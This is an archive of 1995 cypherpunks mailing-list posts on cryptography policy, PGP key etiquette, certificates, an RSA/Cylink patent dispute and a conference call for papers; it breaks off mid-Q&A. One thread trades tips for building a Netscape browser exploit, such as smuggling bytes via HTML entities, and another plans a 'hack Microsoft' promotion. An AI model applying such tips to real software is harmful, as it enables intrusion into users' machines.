Send six copies of your paper and/or proposal for a panel session to John McHugh, Program Co-Chair, at the address given below. Papers and panel proposals must be received by November 6, 1995. Papers, which should include an abstract, must not exceed 7500 words. The names and affiliations of the authors should appear on a separate cover page only, as a ``blind'' refereeing process is used. In addition to the paper submission, an ASCII copy of the paper title and abstract should be sent to the Program Co-Chair (mchugh at cs.pdx.edu) by electronic mail. These will be distributed electronically (without author identification) to the entire program committee to aid in the appropriate assignment of referees. Authors must certify prior to December 25, 1995 that any and all necessary clearances for publication have been obtained. Papers must report original work that has not been published previously, and is not under consideration for publication elsewhere. Abstracts, overlength papers, electronic submissions, late submissions, and papers that cannot be published in the proceedings will be rejected without review. Authors will be notified of acceptance by January 16, 1996. Camera-ready copies are due not later than March 4, 1996.

Panel proposals should describe, in two pages or less, the objective of the panel and the topic(s) to be addressed. Names and addresses of potential panelists (with position abstracts if possible) and of the moderator should also be included. Panels are not intended to serve as alternate paper sessions and it is expected that, with the possible exception of an overview of the topic area by the panel chair, individual presentations by panel members will be limited to five to ten minutes and that at least one third of the session will be reserved for discussion.
Submitters of abstracts for the special session of five-minute talks should submit one page abstracts to John McHugh, Program Co-Chair, at the address given below. The abstract should be one page or less; Email submissions of 30 to 60 lines are preferred. Abstracts must be received by April 2, 1996. Authors will be notified of acceptance or rejection of abstracts by April 16. Submitted abstracts that are accepted will be distributed at the conference. Presenters of five-minute talks are expected to register for the conference. Overtly commercial presentations are inappropriate.

The Symposium will also include informal poster sessions where preliminary or speculative material, and descriptions or demonstrations of software, may be presented. Send one copy of your poster session paper to Dale Johnson, at the address given below, by January 31, 1996, together with certification that any and all necessary clearances for presentation have been obtained.

Again this year, we will attempt to counsel prospective authors. If you have questions about whether or how to present your work to the symposium, please send email to the Chair (dmj at mitre.org), and we will do our best to assist you.

Information about this conference will also be available by anonymous ftp from ftp.cs.pdx.edu in directory /pub/SP96, on the web at http://www.cs.pdx.edu/SP96. The program chairs can be reached by email at sp96 at cs.pdx.edu.

PROGRAM COMMITTEE

  Dave Bailey, Galaxy Computer Services, USA
  Terry Vickers Benzel, TIS, USA
  Lee A. Benzinger, Loral, USA
  Debbie Cooper, DMCooper, USA
  Oliver Costich, Independent Consultant, USA
  Yves Deswarte, LAAS-CNRS & INRIA, FR
  Jim Gray, Hong Kong U. of Sci. and Tech, HK
  Li Gong, SRI, USA
  Sushil Jajodia, GMU, USA
  Paul Karger, GTE, USA
  Carl Landwehr, NRL, USA
  John McLean, NRL, USA
  Catherine A. Meadows, NRL, USA
  Rich Neely, CTA, USA
  Sylvan S. Pinsky, DoD, USA
  Mike Reiter, AT&T, USA
  Sue Rho, TIS, USA
  Peter Ryan, DRA, UK
  Tom Schubert, Portland State Univ., USA
  Stuart Stubblebine, AT&T, USA
  Elisabeth Sullivan, Sequent, USA
  Tom Van Vleck, Taligent, USA
  Vijay Varadharajan, Univ. of Western Sydney, AU
  Yacov Yacobi, Microsoft, USA
  Raphael Yahalom, Hebrew University, Israel
  Mary Ellen Zurko, OSF, USA

For further information concerning the symposium, contact:

Dale Johnson, General Chair
The MITRE Corporation
Mailstop A156
202 Burlington Rd
Bedford, MA 01730-1420, USA
Tel: +1 (617) 271-8894
Fax: +1 (617) 271-3816
dmj at mitre.org

John McHugh, Program Co-Chair
Computer Science Department
Portland State University
P.O. Box 751
Portland OR 97207-0751, USA
Tel: +1 (503) 725-5842
Fax: +1 (503) 725-3211
mchugh at cs.pdx.edu

Steve Kent, Vice Chair
BBN Systems and Technologies
Mailstop 13/2a
70 Fawcett Street
Cambridge, MA 02138
Tel: +1 (617) 873-6328
Fax: +1 (617) 873-4086
kent at bbn.com

George Dinolt, Program Co-Chair
Loral WDL
P.O. Box 49041, MS X20
San Jose, CA 95161-9041
Tel: +1 (408) 473-4150
Fax: +1 (408) 473-4272
dinolt at wdl.loral.com

Charles Payne, Treasurer
Secure Computing Corporation
2675 Long Lake Road
Roseville, MN 55113
Tel: +1 (612) 628-1594
Fax: +1 (612) 628-2701
cpayne at sctc.com

Peter Ryan, European Contact
Defence Research Agency
Room NX17
St Andrew's Rd
Malvern
Worcs WR14 3PS, UK
Tel +44 (0684) 895845
Fax +44 (0684) 894303
ryan at rivers.dra.hmg.gb

Jim Gray, Asia/Pacific Contact
Department of Computer Science
Hong Kong Univ. of Science & Technology
Clear Water Bay, Kowloon, Hong Kong
Tel: +852 358-7012
Fax: +852 358-1477
gray at cs.ust.hk

--- end forwarded text

-----------------
Robert Hettinga (rah at shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA (617) 323-7923
"Reality is not optional."
--Thomas Sowell
>>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<<

From perry at piermont.com Thu Sep 28 08:11:07 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Thu, 28 Sep 95 08:11:07 PDT
Subject: Hack Microsoft
In-Reply-To: <199509281208.IAA06190@pipe4.nyc.pipeline.com>
Message-ID: <199509281510.LAA21039@frankenstein.piermont.com>

John Young writes:
> 9-28-95. W$Japer:
>
> Regarding Netscape, Mr. Dent of Microsoft said the
> firm's security deficiencies that have recently come to
> light have "tainted" electronic commerce on the
> Internet.

That's almost an invitation to hack Microsoft's web products, isn't it? (Anyone from Netscape care to join in the fun?)

Perry

From jamesd at echeque.com Thu Sep 28 08:33:05 1995
From: jamesd at echeque.com (James A. Donald)
Date: Thu, 28 Sep 95 08:33:05 PDT
Subject: Timothy C. May: Mini-mailbombs and Warning Letters
Message-ID: <199509281532.IAA25269@blob.best.net>

At 12:28 PM 9/27/95 -0400, Travis Corcoran wrote:
>A question: in a situation like this one, where an individual signed a
>message with a key then did not make a key with the return address of
>his message available either through his .plan, or a keyserver (the two
>de facto standards), what next step -if any- do people think is more
>appropriate than sending mail to the individual asking them for a copy
>of the key ?

Keep up the good work.

---------------------------------------------------------------------
| We have the right to defend ourselves | http://www.jim.com/jamesd/
and our property, because of the kind |
of animals that we are. True law | James A. Donald
derives from this right, not from the |
arbitrary power of the state. | jamesd at echeque.com

From ses at tipper.oit.unc.edu Thu Sep 28 08:52:03 1995
From: ses at tipper.oit.unc.edu (Simon Spero)
Date: Thu, 28 Sep 95 08:52:03 PDT
Subject: Netscpae & Fortezza (Or, say it Ain't so, Jeff?)
In-Reply-To: <199509281309.JAA12017@bwh.harvard.edu>
Message-ID:

Is this the return of "Mosaic Communications" :-)

From perry at piermont.com Thu Sep 28 08:54:04 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Thu, 28 Sep 95 08:54:04 PDT
Subject: european version of EFF/EPIC/etc?
Message-ID: <199509281553.LAA21103@frankenstein.piermont.com>

I was wondering if the Eurpeans had an equivalent of EPIC or EFF lobbying against crypto restrictions there, given the disturbing news a week or so ago.

Perry

From perry at piermont.com Thu Sep 28 08:59:15 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Thu, 28 Sep 95 08:59:15 PDT
Subject: european version of EFF/EPIC/etc?
In-Reply-To: <199509281553.LAA21103@frankenstein.piermont.com>
Message-ID: <199509281559.LAA21120@frankenstein.piermont.com>

"Perry E. Metzger" writes:
> I was wondering if the Eurpeans had an equivalent of EPIC or EFF

I hate it when I type too fast. Obviously that isn't intended to be a new continent!

> lobbying against crypto restrictions there, given the disturbing news
> a week or so ago.
>
> Perry
>

From cjs at netcom.com Thu Sep 28 09:18:28 1995
From: cjs at netcom.com (cjs)
Date: Thu, 28 Sep 95 09:18:28 PDT
Subject: Simple Hardware RNG Idea
Message-ID: <199509281615.JAA27355@netcom7.netcom.com>

Hello all. Someone mentioned this on IRC last night, and it sounded like a really cool idea, so I thought I'd mention it.

The idea is to generate random numbers using a geiger counter tube and a small portion of radioactive substance (like perhaps the stuff they use in smoke detectors?)

Would that be random enough? I thought it was a neat idea anyway.
Christopher

From sameer at c2.org Thu Sep 28 09:26:05 1995
From: sameer at c2.org (sameer)
Date: Thu, 28 Sep 95 09:26:05 PDT
Subject: Another Netscape Bug (and possible security hole)
In-Reply-To: <9509281050.AA15525@hplyot.obspm.fr>
Message-ID: <199509281619.JAA24789@infinity.c2.org>

>
> No, you *can* put 0x22, 0x3e and 0x2f by using respectively
> " > and / html constructs (&#nnn; nn decimal ascii code)
> unfortunately &#0; is not recognized but you can probably use any number
> subtracted by itself or even short lda#0 (depending on the cpu),...if
> you need a zero,...(what for ?)

Oh that's great.. netscape might -not- be doing the conversion before it crashes though.. worth a shot to check though, without a doubt.

>
> I hope this helps too, btw, anyone having contacts on the 8lgm folks?
> they must have experience with that kind of stuff...

Karl told me that it's their policy only to do exploits for bugs they have found themselves.

> Even if a patch should be available now, making a demonstration is
> still interesting IMO [specially when you know that there are still
> ppl around using netscape 0.9x beta, and even ppl 'selling' it in ISP
> access packages!...]

Look at http://www.c2.org/ with an unpatched netscape. Hopefully other sites will do similar things.

--
sameer                                   Voice:   510-601-9777
Community ConneXion                      FAX:     510-601-9734
An Internet Privacy Provider             Dialin:  510-658-6376
http://www.c2.org (or login as "guest")  sameer at c2.org

From sameer at c2.org Thu Sep 28 09:26:20 1995
From: sameer at c2.org (sameer)
Date: Thu, 28 Sep 95 09:26:20 PDT
Subject: STT_???
In-Reply-To: <199509281208.IAA06190@pipe4.nyc.pipeline.com>
Message-ID: <199509281621.JAA24930@infinity.c2.org>

>
> Regarding Netscape, Mr. Dent of Microsoft said the
> firm's security deficiencies that have recently come to
> light have "tainted" electronic commerce on the
> Internet. Mr.
> Dent also noted that Microsoft yesterday
> introduced new security technology, including means to
> verify a user's identity, that is much stronger than
> Netscape's.

Yeah. Right. I propose we show the world how Microsoft will respond to security problems. I should have a tentative web page up by later tonight.

--
sameer                                   Voice:   510-601-9777
Community ConneXion                      FAX:     510-601-9734
An Internet Privacy Provider             Dialin:  510-658-6376
http://www.c2.org (or login as "guest")  sameer at c2.org

From tjic at OpenMarket.com Thu Sep 28 09:40:25 1995
From: tjic at OpenMarket.com (Travis Corcoran)
Date: Thu, 28 Sep 95 09:40:25 PDT
Subject: Timothy C. May: Mini-mailbombs and Warning Letters
In-Reply-To: <9509280438.AA23997@cantina.verity.com>
Message-ID: <199509281640.MAA20585@cranmore.openmarket.com>

> Date: Wed, 27 Sep 1995 21:38:33 -0700
> From: patrick at Verity.COM (Patrick Horgan)
>
> > > > but the key was not there. Please mail me your key. Thank you.
> >
> > constructive suggestion as to how this mail could be changed
> > to convey more information or to be less "threatening", please mail me.
>
> Sure, I found the above offensive. It comes across in exactly the same
> tone as a cop saying, "Please step away from the car."

Ack! ;) Not my intention at all, but a good observation...

> The simple change:
>
> but the key was not there. Could you please mail me your key? Thanks.
>
> works miracles:) The tone on the rest of it was nice. You have to be careful
> with imperatives. They usually sound mean...even with a please at the front.

I got this letter in favor of some change in the wording, and a few letters saying "wording is fine as is". I assume that those who currently have no beef with the wording will not be offended by the added words, thus I have happily integrated Patrick's suggestion.
I have also added to the code a list of people who don't like receiving key-queries, added a test that gives an error if the user attempts to send a key-query to such an address, and made TCM's address the default value for the list.

I have also added code to maintain a disk-based list of addresses that have already been mailed for a key, and added code that checks against this list before sending mail.

I'll put this latest version of mail-secure.el (also upgraded to work with the latest version of mailcrypt (3.3)) on my web page within a day or so. Until then, anyone who wants a copy can mail me.

To those who sent polite suggestions: thank you. Your constructive criticism has helped make mail-secure.el a better tool. I encourage anyone else who has suggestions or comments to mail me. I try to be responsive to constructive input, as doing so helps the package improve, be accepted and get used.

TJIC

From sameer at c2.org Thu Sep 28 09:48:01 1995
From: sameer at c2.org (sameer)
Date: Thu, 28 Sep 95 09:48:01 PDT
Subject: awards for hacking microsoft
Message-ID: <199509281642.JAA26140@infinity.c2.org>

I've been working on putting together my hack microsoft promotion and I need to think of a good low-budget award. T-shirts would not be economically feasible -- I expect to be awarding many microsoft awards.. Ideas would be appreciated. Thanks.

--
sameer                                   Voice:   510-601-9777
Community ConneXion                      FAX:     510-601-9734
An Internet Privacy Provider             Dialin:  510-658-6376
http://www.c2.org (or login as "guest")  sameer at c2.org

From WOOD at VAX2.ROCKHURST.EDU Thu Sep 28 09:50:44 1995
From: WOOD at VAX2.ROCKHURST.EDU (WOOD at VAX2.ROCKHURST.EDU)
Date: Thu, 28 Sep 95 09:50:44 PDT
Subject: [NOISE] Java
Message-ID: <01HVT4585WLY000R2D@VAX2.ROCKHURST.EDU>

> From: IN%"jya at pipeline.com" "John Young" 25-SEP-1995 15:29:30.33
> To: IN%"WOOD at VAX2.ROCKHURST.EDU"
> CC:
> Subj: JAV_jiv
>
>
> The New York Times, September 25, 1995, pp. D1, D4.
>
>
>
> Sun is a maker of computers and software using the
> industry-standard Unix software operating system and the
> leading provider of so-called Internet server computers
> that act as the gateway through which most people's desktop
> computers actually send and receive data over the Net.
> Figuring that what is good for the Internet is good for
> Sun, the company now hopes to turn Java into an industry
> standard by making it freely available to individuals and
>                                ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> universities, while licensing it to companies that
> incorporate it into software products.
>

Does anyone know when or where Java is available?

Many thanks,

-------------------------------------------
| "Computers are boring and slow."        |
|                                         |
| David Wood                              |
| Information Systems Specialist?         |
| wood at vax2.rockhurst.edu                 |
-------------------------------------------

From AlanPugh at MAILSRV2.PCY.MCI.NET Thu Sep 28 10:06:43 1995
From: AlanPugh at MAILSRV2.PCY.MCI.NET (Alan Pugh)
Date: Thu, 28 Sep 95 10:06:43 PDT
Subject: sled corp
Message-ID: <01HVT6WVKX368ZE7S0@MAILSRV1.PCY.MCI.NET>

-----BEGIN PGP SIGNED MESSAGE-----

Hello C-Punks,

I recently found a company called "sled corp" at they are a white pages directory service (who i have absolutely no relationship with) that claims they will sign someone's pgp key for $20/year. to verify the identity of the person's key they are signing, they require either 1) a mailed or faxed copy of a driver's license, 2) mailed or faxed copy of a passport, or 3) a preprinted personal check (which cleared).

i'm not sure how much i would trust this type of signature anyway, as all 3 of the above methods of identification can be easily forged, but i'd appreciate some comments by some of the folks out there that have considered the concept of key signatures. if anyone has had any dealings with this company, i would appreciate any comments on them.
feel free to contact me privately if you'd like at either

amp <0003701548 at mcimail.com>
PGP Key = 4A2683C1
PGP FP = A7 97 70 0F E2 5B 95 7C DB 7C 2B BF 0F E1 69 1D

September 28, 1995 12:58

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMGrUMCgP1O9KJoPBAQGVyQf/fAgOhopOQsWUqG2WiiUPNvW7pAmvkzC6
4zJwxWOduNyrROVPO+NKcJqn4aC7LrZU1qaqZsecBFfoNmGgXwiYLGp9NIVWSFLP
uXdqo+RouDLJSkyWmjhrfYKP/4aN9JaNuesjudu03KDVwDMU2rks9KCHwvQzH6Ry
pFez0YIApA4Y/PgTsq2D2msj4gnEQuXi3y+o28ic/rAtJxY6iPkvX2XJdEW+6KW8
RWp4rFfC6l3T5ccVJ4n6UjJ4wUZsHI93Z7hBdWGJQVaF1g5IQCdmTSCj1EWP/zzp
YH/KcPwqaqjNEiECjCEXCuMEV2ZZPtN0jCXp6KFrIm/ZRzkC3I4SPg==
=i2do
-----END PGP SIGNATURE-----

From stewarts at ix.netcom.com Thu Sep 28 10:37:23 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Thu, 28 Sep 95 10:37:23 PDT
Subject: Prvasoft FAX Encryption Software
Message-ID: <199509281737.KAA15710@ix8.ix.netcom.com>

After the recent discussions of the Privasoft Fax Software and its proprietors' dislike of the Cryptographers' Inquisition :-), I wrote the author a neutral note discussing what I'm trying to accomplish for one of my customers, and asked about evaluation copies. He's put it on the Web at www.megasoft.com/privasoft/ ; it's "not crippleware", just limited number of uses. So anybody who wants to do some research into proprietary patented trade-secret products [_I_ didn't say Snake Oil in this posting :-)], there it is.

His description of it sounds like it's got a reasonably friendly GUI, though I'm not sure that rates $130 when you can get fax software free with modems or really high-quality OCR-equipped fax software for less than that...
#---
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

From stewarts at ix.netcom.com Thu Sep 28 10:37:25 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Thu, 28 Sep 95 10:37:25 PDT
Subject: Netscape as vehicle for cypherpunk agenda/the cypherpunk bully pulpit
Message-ID: <199509281737.KAA15679@ix8.ix.netcom.com>

At 10:40 AM 9/25/95 -0700, sameer wrote:
> The really big sticking point I see, however, is the
>certification authorities. There is a single point of failure here and
>that is at Verisign. This becomes a large problem I think if the
>encrypted email that Netscape does requires personal x509 certificates (I
>read that Verisign is issuing those for $9/each.) This is a problem
>because for one thing I don't think Verisign will want to issue certs
>to pseudonyms, and Netscape may not talk encrypted email to
>non-certified people. (I am not sure)

Verisign has a range of certificate types; a "Type I", which only promises that the userid is unique and is otherwise unverified, is free for non-commercial users and something like $6 for commercial; Types II and III require various levels of documentation and $$ to get. The www.verisign.com home page didn't exactly say how to get one; I gather the answer is "wait for October" or "Use the next Netscape version", where I don't remember if that's 1.2.2 or 2.0.

Netscape is being modified to accept non-Verisign CAs, which means we _can_ build a web of trust to take advantage of it, using X.509 certs or a hybrid of X.509 and PGP.
#---
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

From stewarts at ix.netcom.com Thu Sep 28 10:39:49 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Thu, 28 Sep 95 10:39:49 PDT
Subject: 25 Crays a Year to Break STT
Message-ID: <199509281737.KAA15655@ix8.ix.netcom.com>

> Microsoft said its Secure Transaction Technology (STT), was
> designed to provide a much higher level of security for
> credit card transactions on the Internet. Netscape's
> general purpose encryption system uses a 40 or 128-bit
> electronic "key", while STT will use 2,000-bit keys.

Sigh. Apples and oranges, and they know it.

....
> Although no encryption system was totally secure, Mr Dent
> estimated it would take "25 Cray supercomputers a year" to
> break the STT codes.

So how much work can 25 Crays do in a year? Crack single-DES? Maybe RC4/64?

#---
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

From todd at lgt.com Thu Sep 28 10:39:53 1995
From: todd at lgt.com (Todd Glassey)
Date: Thu, 28 Sep 95 10:39:53 PDT
Subject: FSTC - What is it...
Message-ID:

In answer to your question: I am not the official spokesperson for the organization. In fact I serve on a working group in an advisory and design review capacity. However I can tell you that:

The Financial Services Technology Consortium (FSTC) is a consortium of financial services providers, national laboratories, universities, and government agencies who sponsor and participate in non-competitive collaborative research and development on interbank technical projects.

The home page is located at http://www.llnl.gov/fstc and although still under construction offers pointers to a number of our projects like e-check and electronic-payment-handler as well as fraud-prevention tools and technologies.
As to the actual posting of the website I just finished this yesterday so it will be listed pretty much in all the "cool places".

a good point of contact for FSTC is: Dan.Schutzer at citicorp.com (Dan, please forgive me for giving the world your name!)

I personally see FSTC as the strongest player in the secure e-commerce effort and would advise any banking and other financial services players (including the bond and stock houses) to get onto their bandwagon, yesterday... This leads me to believe that because of their Federal Involvement/Sponsorship, that they will indeed become *the* defacto standards organization.

As to the meetings planned they are scheduled for the
-----------------------------------------------------
10-Oct-95 E-Payment Working Group - Security Services, Cambridge Mass.
11-Oct-95 W3C meeting, Cambridge Mass.
26-Oct-95 E-Payment Working Group, General Meeting, Teaneck, NJ.

Hope this answers your questions...

Sincerely,

Todd Glassey
E-Payment Working Group
Chief Technologist
Looking Glass Technologies
todd at lgt.com

>This reached me via a couple of lists, so I hope I'm replying to the
>right person:
>
>
>>FYI- the FSTC E-payment Working Group meeting is happening at the W3 meeting
>>on the day before the meeting itself. The meeting is being held at the OSF
>>facilities.
>
>Did you send this note? Can you tell me a bit more about this --
>what's FSTC?
>
>Thanks!
>
>--Michael Smith
> smithmi at dev.prodigy.com
>
> Support the Zimmerman legal defense! http://www.netresponse.com/zldf

From tjic at OpenMarket.com Thu Sep 28 11:13:24 1995
From: tjic at OpenMarket.com (Travis Corcoran)
Date: Thu, 28 Sep 95 11:13:24 PDT
Subject: Timothy C. May: Mini-mailbombs and Warning Letters
Message-ID: <199509281813.OAA20769@cranmore.openmarket.com>

-----BEGIN PGP SIGNED MESSAGE-----
Message-Signature-Date: Thu Sep 28 14:13:09 1995

> To: cypherpunks at toad.com
> From: tcmay at got.net (Timothy C.
May)
>
> At 6:33 PM 9/27/95, Travis Corcoran wrote:
>
> What I call a robo-warning was this:
>
> " P.S. This mail was composed by my mailreading sftwr, which
> automatically scans incoming mail, looking for failed keyserver
> requests, and prompts me whether it should automatically send this msg
> on my behalf. If there is a bug w this sftwr (for example, you never
> PGP sign your msgs, so this entire msg makes no sense), or if you're
> interested in the software itself (mail-secure.el: a package in lisp
> for emacs; this is just one of the many crypto/privacy related things
> it does) please mail the author of this package ( tjic at openmarket.com)
> for details.

Well, I still don't understand why you call a message that says

1) "I tried to verify a signature"
2) "please mail me your key"
3) "if there's a bug, please mail the author"

a "warning". I guess we're just using the word "warning" differently...

> As to whether I needed to respond to your robo-warning about how
> your automatic scan of incoming mail produced some kind of
> Signature Failure Condition Red at your end, I just ignored your
> message.

I never stated or implied that anyone "needed to" respond to query-mail. To the contrary, I said in all seriousness that ignoring query-mail was "a fine anarchistic solution to the problem".

> As others will attest, when people ask me for my key in a
> non-automated way, I usually send it to them.

Well, I still don't understand your objection to labor-saving software any more than I understand the lifestyles of the Amish, but that's my problem, not anyone else's.

> My _overall_ point was not to attack Travis C., who I don't think I
> even mentioned by name, but to point out that great care must be
> taken in running automated mail-response programs

I did not take your comments on mail-secure.el as an attack on myself, but I did want to defend both the use of labor-saving software and parts of my particular implementation.
Specifically, I defended the package against incorrect accusations on your part:

1) the query-mail was not a warning
2) the query-mail was not in response to the content of a post
3) the query-mail was not the first method used, but a last-ditch attempt
4) a human is in the loop
5) the keyserver used is not based on some trivial "preference"

However, I do agree whole-heartedly with your above assertion that "great care must be taken in running automated mail-response programs". For this reason I have responded to your and other posts by adding features to the package to make it even less likely to bother people who don't want to be bothered.

> Finally, since Travis is making a fairly big deal over my citing of
> his post (though anonymously, as I recall), I'd like to see the
> post he claims I signed.

To the very best of my knowledge *I* did not send you a piece of mail requesting your key...I've had your key in my keyring for over a year. Further, I am not asserting that I saw a signed message from you any time recently.

> >If anyone has a constructive suggestion as to how this mail could be
> >changed to convey more information or to be less "threatening", please
> >mail me.
>
> Simple, don't bother to ask in the first place. Or ask informally, in
> ordinary English. Skip the "This mail was composed by my mailreading sftwr,
> which automatically scans incoming mail, looking for failed keyserver
> requests..." nonsense.

Nonsense? It seems to me that the information is useful, for two reasons:

(1) it alerts the recipient to the semi-automated nature of the mail, which allows the recipient to prioritize his response (if any) to it.

(2) it alerts the recipient that incorrect receipt of a key-request could be caused by a software bug (as opposed to some attempt to forge email).

(3) it notes the existence of the package, which the recipient might be interested in (in the same way many cryptography-aware programs add a comment line to a PGP-signature).
By the way, I have had several people ask for a copy of mail-secure.el after receiving a key-request from the package, which translates into several more people encrypting their email and verifying the messages they receive.

> I don't need some fraction of them running their own "key etiquette
> agents" inspecting my posts for conformance to their preferences.

Once again you're [ willfully ? ] missing the point: etiquette and preferences have nothing to do with it, and your repeated assertions to the contrary trivialize the desire of some people to authenticate messages they receive (which I and others consider to be a reasonable goal).

- - --
TJIC (Travis J.I. Corcoran) http://www.openmarket.com/personal/tjic/
Member EFF, GOAL, NRA. opinions (TJIC) != opinions (employer (TJIC))
"Buy a rifle, encrypt your data, and wait for the Revolution!"
PGP encrypted mail preferred. Ask me about gnuslive.el for emacs.

-----BEGIN PGP SIGNATURE-----
Version: 2.6
Comment: Auto-signed by mail-secure.el 1.002 using mailcrypt
Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface

iQCVAwUBMGrlu4JYfGX+MQb5AQGiSwP+MMgoog/vmsxKU5Zo17L5ZE3KVlYWsbQ7
9kcVb8d2CLPyAyaU4iNmF5dLwdYyy0reft9jhzQAaZ/1Nm0+9KXGAhT7DdO2nDFT
hGc9KiQ/IYEkkhkRJIRRNkVNGeWclbf9J/ffQUUNBBTBbJkjjwoLFns+GA6D2Qx/
xs8QFel7kvQ=
=6Gyn
-----END PGP SIGNATURE-----

From cjl at welchlink.welch.jhu.edu Thu Sep 28 11:38:41 1995
From: cjl at welchlink.welch.jhu.edu (cjl)
Date: Thu, 28 Sep 95 11:38:41 PDT
Subject: awards for hacking microsoft
In-Reply-To: <199509281642.JAA26140@infinity.c2.org>
Message-ID:

On Thu, 28 Sep 1995, sameer wrote:

> I've been working on putting together my hack microsoft
> promotion and I need to think of a good low-budget award. T-shirts
> would not be economically feasible -- I expect to be awarding many
> microsoft awards.. Ideas would be appreciated. Thanks.
>

What else, Chaum's Digicash.
If you are unwilling to part with any of your own, perhaps you can collect contributions, or maybe the Digicash people will pony-up some extra cyberbucks for a good cause. After all, they are worth the paper they're printed on. :-)

C. J. Leonard                     ( /       "DNA is groovy"
                                   \ /        - Watson & Crick
                                   / \   <-- major groove
                                  ( \
Finger for public key              \ )
Strong-arm for secret key          / )   <-- minor groove
Thumb-screws for pass-phrase      / )

From baldwin at RSA.COM Thu Sep 28 12:03:44 1995
From: baldwin at RSA.COM (baldwin (Robert W. Baldwin))
Date: Thu, 28 Sep 95 12:03:44 PDT
Subject: Q&A on the RSA/Cylink legal dispute
Message-ID: <9508288123.AA812314973@snail.rsa.com>

Here is RSA's Question & Answer sheet on the arbitration. It is available on our web site, www.rsa.com.

--Bob

______________________________ Forward Header __________________________________

[RSALogo]
---------------------------------------------------------------

Q&A ON THE RSA/CYLINK LEGAL DISPUTE

This page contains general questions that have been brought up to us regarding the legal dispute between RSA and Cylink. We are providing these answers in hopes that you may better understand the issues.

----------------------------------------------------------------------------

September 25, 1995

Q. How did RSA's legal disputes with Cylink begin?

A. It began in April of 1994 when Cylink filed an Arbitration Demand seeking to have a panel rule that Cylink was entitled to a retroactive patent license to RSA, also called the MIT patent. That was the extent of their Arbitration Demand at that time. The dispute was precipitated by RSA's discovery that Cylink had entered into a secret deal to provide products incorporating the patented MIT technology - even though Cylink knew it did not have a license.

------------------

Q. Why didn't PKP/RSA just sell them one? Isn't that their business?

A. We offered them one several times. They wanted to pay essentially nothing for it.
Although Cylink denied it, the fact that we offered them a license was confirmed by the Arbitrators in their ruling.

------------------

Q. Patents are routinely licensed and royalties routinely paid; why did Cylink go to the extraordinary length of suing RSA Data Security to obtain a license?

A. We learned that in April of 1994 Cylink had won, over other bidders, a very substantial business deal with SWIFT (an international banking consortium) to provide X.25 encryption units for use by SWIFT on a worldwide basis. SWIFT had insisted that these products use the RSA patented technology for key management and authentication. Cylink had represented to SWIFT in their April 1994 contract that Cylink had a license to provide RSA technology. But they didn't.

Cylink chose to sue us to win a retroactive license rather than simply admit what they had done and pay for a license. Cylink never informed us of their use of RSA or the representation to SWIFT. They never paid a penny to PKP or RSA for their unlicensed use of the RSA technology. They never even put any royalties aside. None of these facts are in dispute and are all a matter of public record.

------------------

Q. How did the litigation go beyond a limited Arbitration over a license?

A. We didn't understand it at the time, but it's obvious now. While more claims and counterclaims were added to the Arbitration demand, Cylink knew of their SWIFT problem and other similar problems; we didn't. We believe that they were desperately trying to cover their unlicensed use of RSA by trying to litigate us into submission before it was discovered. It didn't work.

------------------

Q. What were the additional claims by each side?

A. Charges were made by each RSA and Cylink that the other had breached the exclusive licensing authority of PKP among other wrongful acts. This brought a second set of issues for the Arbitrators.
Finally, both parties asked to have PKP dissolved as we obviously could not continue as business partners; this was the third issue to be decided.

It's quite clear in the Arbitration Panel's ruling that there were only three issues to be decided: (a) is Cylink entitled to a retroactive license to use RSA; (b) did either party breach the Partnership Agreement; and (c) should PKP be dissolved. The answers were no, no, and yes.

------------------

Q. If that's true, then how does Cylink claim that the Panel's ruling determined that RSA software customers are infringing the Stanford patents?

A. The Arbitration Panel did not determine that the use of RSA software by RSA licensees or that the practice of RSA infringes the Stanford patents. It is most certainly true that the ruling was very limited; the Ruling itself starts out by stating the questions. The Panel did not, under any interpretation, rule on patent validity or determine that anyone was infringing. Cylink's claims to the contrary, along with their claims that somehow Cylink can rely on the Ruling to prove infringement is simply not true and ignores many other facts.

------------------

Q. What other facts?

A. The Panel's ruling was very specific. Everything it said about third parties, including RSA customers who use software, refers to their need for patent licenses. If you bought software from RSA and RSA itself had the rights to make that software and license it to you, you don't need a separate patent license; rights to the patents came with the product. The Ruling also states, "RSA has a right to license its software."

------------------

Q. Under what circumstances would you need a separate patent license?

A. If you want to make your own product -as opposed to buying one, such as RSA's software- you need a patent license. If you bought a software product but didn't use it, meaning you wrote your own, or re-wrote it, then you may need a separate patent license to do that.
We believe the Panel was simply making it clear that just because you bought software from RSA, that fact alone doesn't mean you are free from the need for a separate patent license if you're not using the RSA software and making your own. You didn't get an explicit patent license with the software, you got rights under the patents as necessary to use the software. If you're using RSA's software -you didn't write your own- you don't need a separate patent license under either the MIT or Stanford patents.

------------------

Q. Are there other relevant facts that Cylink has ignored?

A. Perhaps the most important fact that Cylink is carefully ignoring is that Cylink knows RSA did indeed have rights to make products under the MIT and Stanford patents. Cylink, for over five years, knowing full well what RSA sold and how, has not only referred customers to us, but in some cases where the customer was being cautious, Cylink confirmed to them in writing at their request that no separate patent licenses were necessary if they licensed RSA software. In other words, prospects of RSA's went to Cylink and said, "We're going to license this software from RSA. Do we need separate patent licenses from Cylink or PKP?" Cylink confirmed the answer - no. (And those companies then did in fact license our software. Cylink didn't turn around and sue them.)

This alone should deter Cylink from bringing infringement suits against RSA customers. Nothing in the Panel's ruling changes any part of these facts. In fact, Cylink's acknowledgment that RSA had such rights came out in the Arbitration proceeding itself. It's a matter of record.

Cylink would also not like anyone to be aware that a suit was filed in Federal Court in 1994 to invalidate the Stanford patents, and that a ruling is due in December.

------------------

Q. How is RSA protecting its customers from action by Cylink?

